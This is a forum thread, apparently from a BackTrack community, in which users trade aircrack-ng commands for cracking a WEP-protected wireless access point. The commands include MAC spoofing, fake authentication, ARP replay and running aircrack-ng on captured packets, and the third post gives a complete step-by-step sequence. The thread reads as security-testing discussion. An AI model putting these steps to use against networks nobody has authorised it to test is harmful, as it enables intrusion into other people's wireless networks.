Results 1 to 4 of 4

Thread: WEP Crack Aireplay-ng

  1. #1
    Just burned his ISO kiloraw's Avatar
    Join Date
    Jan 2010
    On the side, in the middle, compass points east

    Default WEP Crack Aireplay-ng

    First i must say, wonderful job on the vol. 4. I think going to Ubuntu to will be well worth it, sucks for the guru's right now, but like I said it will be worth it.

    As for my problem:
    At work, trying to crack a AP WEP. I will have to do this alot more, since it will be my job to test the security of wireless AP, which will have WPA2. Trying to crack WEP now, for knowledge and seems logical. The AP has know clients, and the ESSID is not broadcasted. I decided to ask what was the AP's ESSID for my co-worker, so that I could troubleshoot, if it was a user error or not.

    Card: 3945 iwl

    airmon-ng stop (interface)
    ifconfig (interface) down
    macchanger --mac 00:11:22:33:44:55 (interface)
    airmon-ng start (interface)

    airodump-ng (interface)
    airodump-ng -c (channel) -w (file name) --bssid (bssid) (interface)

    aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface)

    The command above is were i get stuck, aircrack tutorial says to "Do not proceed to the next step until you have the fake authentication running correctly."

    The terminal comes back and states
    Sending Authentication Request (shared) [ACK]
    Authentication 1/2 successful
    Sending encrypted challenge
    Attack was unsuccessful
    Then gives me a list of reason's why it did not work.

    NEVERMIND this post....Figured it out.....You have to at least have prior data to crack WEP
    I read the forum discussion really cleared up alot. I recommend to all future newbs(including myself), to really read the aircrack site.
    Just to make sure and please someone post if this is true
    "The tutorials are about the situation when you see no client :
    but to do the fragmentation you need the WEP encrypted data thus either it is from previous session or from a nonvisible client, as there is no data obtain from fakeauth. When you read any tutorial look at the MAC's in collected packets used to frag attack.
    LAN client can seIf you have no client connected ( wlan or lan ) you have no data to collect thus cannot attack the AP unless you have previously collected data.
    nd data through wireless when addressing wireless client"
    Last edited by kiloraw; 01-22-2010 at 09:32 PM. Reason: Figured out my own problem...

  2. #2
    Super Moderator Archangel-Amael's Avatar
    Join Date
    Jan 2010

    Default Re: WEP Crack Aireplay-ng

    This is not a how-to or tutorial Please post in the correct section of the forums.

  3. #3
    Join Date
    Jan 2010
    Helsinki, Finland

    Default Re: WEP Crack Aireplay-ng

    Well I do WEP like this
        airmon-ng stop wlan0
        airmon-ng start wlan0
        "Ill be using mon0 (its now in monitor mode)"
        airodump-ng mon0 -w /tmp/WEP --channel (AP c hannel) --bssid (AP bssid)
        aireplay-ng -1 0 -a bssid (AP bssid) mon0
        aireplay-ng -3 -b (AP bssid) mon0
    Wait untill the number in newiest console is over 30000 (the second number)
     Then Stop all of these
     aircrack-ng /tmp/WEP-01.cap
    Here is a quide

    Yes I use No clients WEP hack even if ther is clients
    Last edited by halfdone; 01-23-2010 at 12:15 PM.

  4. #4
    Junior Member
    Join Date
    Jan 2010

    Default Re: WEP Crack Aireplay-ng

    You need fake auth with shared key...

    Shared key can be hooked when client connect to AP...
    To hook shared key u can use airodump-ng, and wait unti someone connect

    Then u have to fake auth

Similar Threads

  1. How to crack WPA on a cluster
    By MikeCa in forum BackTrack Howtos
    Replies: 12
    Last Post: 02-04-2011, 02:12 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts